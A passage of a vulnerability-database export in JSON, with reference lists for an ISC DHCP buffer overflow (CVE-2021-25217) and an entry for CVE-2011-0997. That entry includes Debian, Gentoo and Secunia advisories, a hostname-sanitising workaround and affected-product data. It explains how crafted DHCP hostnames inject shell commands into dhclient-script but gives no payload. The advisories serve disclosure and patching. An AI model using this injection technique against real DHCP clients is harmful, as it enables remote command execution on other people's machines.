"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3560"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33910"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989157"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/alas-2021-1510.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14347"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23240"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9951"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23239"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36242"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14345"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13584"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14360"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13584"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25659"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3119"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14344"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14345"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14344"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23336"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14361"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12364"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28469"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28500"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29418"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33034"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28092"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28851"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29482"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23337"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27358"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23368"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11668"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23364"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28851"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20934"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28469"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3016"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3377"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29477"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29478"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23839"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33623"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23382"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2469"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2420"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2414"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2416"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2357"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25217"
},
{
"db": "PACKETSTORM",
"id": "163789"
},
{
"db": "PACKETSTORM",
"id": "163747"
},
{
"db": "PACKETSTORM",
"id": "163196"
},
{
"db": "PACKETSTORM",
"id": "163155"
},
{
"db": "PACKETSTORM",
"id": "163144"
},
{
"db": "PACKETSTORM",
"id": "163145"
},
{
"db": "PACKETSTORM",
"id": "163051"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1759"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
},
{
"db": "NVD",
"id": "CVE-2021-25217"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2021-25217",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163789",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163747",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163196",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163155",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163144",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163145",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163051",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1759",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-25217",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-26T00:00:00",
"db": "VULMON",
"id": "CVE-2021-25217",
"ident": null
},
{
"date": "2021-08-11T16:15:17",
"db": "PACKETSTORM",
"id": "163789",
"ident": null
},
{
"date": "2021-08-06T14:02:37",
"db": "PACKETSTORM",
"id": "163747",
"ident": null
},
{
"date": "2021-06-17T18:09:00",
"db": "PACKETSTORM",
"id": "163196",
"ident": null
},
{
"date": "2021-06-15T15:18:36",
"db": "PACKETSTORM",
"id": "163155",
"ident": null
},
{
"date": "2021-06-15T14:50:28",
"db": "PACKETSTORM",
"id": "163144",
"ident": null
},
{
"date": "2021-06-15T14:51:01",
"db": "PACKETSTORM",
"id": "163145",
"ident": null
},
{
"date": "2021-06-09T13:43:37",
"db": "PACKETSTORM",
"id": "163051",
"ident": null
},
{
"date": "2021-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1759",
"ident": null
},
{
"date": "2021-06-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-001741",
"ident": null
},
{
"date": "2021-05-26T22:15:07.947000",
"db": "NVD",
"id": "CVE-2021-25217",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2021-25217",
"ident": null
},
{
"date": "2023-05-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1759",
"ident": null
},
{
"date": "2022-09-20T06:10:00",
"db": "JVNDB",
"id": "JVNDB-2021-001741",
"ident": null
},
{
"date": "2023-11-07T03:31:24.893000",
"db": "NVD",
"id": "CVE-2021-25217",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1759"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "ISC\u00a0DHCP\u00a0 buffer overflow vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1759"
}
],
"trust": 0.6
}
}
VAR-201104-0082
Vulnerability from variot - Updated: 2026-03-09 22:43dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message, as demonstrated by a hostname that is provided to dhclient-script. The ISC dhclient contains a vulnerability that could allow a remote attacker to execute arbitrary code on the client machine. Apple From Apple Time Capsule and AirPort Base Station (802.11n) Firmware update for has been released.Crafted DHCP Any command may be executed by processing the response. Depending on the script and OS, this can result in execution of exploit code on the client.
CVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C)
For more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
Workarounds:
On SUSE systems, it is possible to disable hostname update by setting DHCLIENT_SET_HOSTNAME="no" in /etc/sysconfig/network/dhcp.
Other systems may add following line to dhclient-script at the beginning of the set_hostname() function:
new_host_name=${new_host_name//[^-.a-zA-Z0-9]/}
In environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers.
Active exploits:
None known at this time. https://www.isc.org/downloads/all
No patch is available for 4.0.x as it is EOL. Anyone running 4.1.x should upgrade to 4.1-ESV-R2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Debian Security Advisory DSA-2216-1 security@debian.org http://www.debian.org/security/ Nico Golde April 10, 2011 http://www.debian.org/security/faq
Package : isc-dhcp Vulnerability : missing input sanitization Problem type : remote Debian-specific: no CVE ID : CVE-2011-0997 Debian bug : 621099
Sebastian Krahmer and Marius Tomaschewski discovered that dhclient of isc-dhcp, a DHCP client, is not properly filtering shell meta-characters in certain options in DHCP server responses. These options are reused in an insecure fashion by dhclient scripts.
For the oldstable distribution (lenny), this problem has been fixed in additional update for dhcp3.
For the stable distribution (squeeze), this problem has been fixed in version 4.1.1-P1-15+squeeze2.
For the testing distribution (wheezy), this problem will be fixed soon.
For the unstable distribution (sid), this problem has been fixed in version 4.1.1-P1-16.1.
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk2iJ1AACgkQHYflSXNkfP8fEwCglH3YEMa8hlo7ChGFlvT7K9v5 BMcAoIuGqJofENG1o5SiXU1/E9qEF/Am =5Q/C -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201301-06
http://security.gentoo.org/
Severity: Normal Title: ISC DHCP: Denial of Service Date: January 09, 2013 Bugs: #362453, #378799, #393617, #398763, #428120, #434880 ID: 201301-06
Synopsis
Multiple vulnerabilities have been found in ISC DHCP, the worst of which may allow remote Denial of Service.
Background
ISC DHCP is a Dynamic Host Configuration Protocol (DHCP) client/server.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/dhcp < 4.2.4_p2 >= 4.2.4_p2
Description
Multiple vulnerabilities have been discovered in ISC DHCP. Please review the CVE identifiers referenced below for details.
Resolution
All ISC DHCP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/dhcp-4.2.4_p2"
References
[ 1 ] CVE-2011-0997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0997 [ 2 ] CVE-2011-2748 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2748 [ 3 ] CVE-2011-2749 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2749 [ 4 ] CVE-2011-4539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4539 [ 5 ] CVE-2011-4868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4868 [ 6 ] CVE-2012-3570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3570 [ 7 ] CVE-2012-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3571 [ 8 ] CVE-2012-3954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3954 [ 9 ] CVE-2012-3955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3955
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201301-06.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . This issue is addressed by stripping shell meta-characters in dhclient-script.
It is recommended that AirPort Utility 5.5.3 or later be installed before upgrading to Firmware version 7.6. ----------------------------------------------------------------------
Q1 Factsheets released:
http://secunia.com/resources/factsheets/2011_vendor/
TITLE: ISC DHCP "dhclient" Response Processing Input Sanitation Vulnerability
SECUNIA ADVISORY ID: SA44037
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44037/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44037
RELEASE DATE: 2011-04-07
DISCUSS ADVISORY: http://secunia.com/advisories/44037/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/44037/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44037
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in ISC DHCP, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to certain shell meta-characters not being stripped or escaped when processing responses from a DHCP server. This can be exploited to submit shell commands to the "dhclient-script" script via e.g. a specially crafted "hostname" response.
The vulnerability is reported in versions 3.0.x through 4.2.x.
SOLUTION: Update to version 3.1-ESV-R1 and 4.1-ESV-R2 or 4.2.1-P1.
Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY: The vendor credits Sebastian Krahmer and Marius Tomaschewski, SUSE Security Team.
ORIGINAL ADVISORY: https://www.isc.org/software/dhcp/advisories/cve-2011-0997
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.6,
"vendor": "isc",
"version": "4.2.0"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.6,
"vendor": "isc",
"version": "4.1-esv"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.6,
"vendor": "isc",
"version": "4.2.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "10.04"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.2"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.6"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.1"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "6.06"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.3"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.1.3"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.10"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.1.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "10.10"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.5"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.1.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "7.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.04"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.1.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.1-esv"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.4"
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian gnu linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "internet consortium",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mandriva s a",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ubuntu",
"version": null
},
{
"_id": null,
"model": "airmac base station",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "7.6"
},
{
"_id": null,
"model": "time capsule",
"scope": null,
"trust": 0.8,
"vendor": "apple",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#107886"
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
},
{
"db": "NVD",
